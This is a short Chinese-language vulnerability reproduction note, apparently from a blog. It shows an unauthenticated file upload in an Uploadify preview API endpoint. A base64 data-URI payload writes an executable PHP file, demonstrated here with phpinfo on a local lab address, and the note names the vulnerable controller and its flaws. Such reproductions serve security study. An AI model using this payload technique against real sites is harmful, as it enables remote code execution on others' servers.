in 分享 with 0 comment

复现环境

复现过程

利用地址:http://192.168.2.1/index.php/api/Uploadify/preview

先将 <?php phpinfo(); base64编码

payload:

data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

Tips:部分在线编码会编码成 Jmx0Oz9waHAgcGhwaW5mbygpOw==,这样生成的文件中 < 会被转义,变成 &lt;?php phpinfo();,导致无法执行。

地址:

http://192.168.2.1/preview/3595ba653cb9453a3ba63aa47152b40f.php

漏洞分析

涉及文件:\application\api\controller\Uploadify.php

  1. 没有上传图片权限限制
  2. 上传图片后缀可控无限制
Responses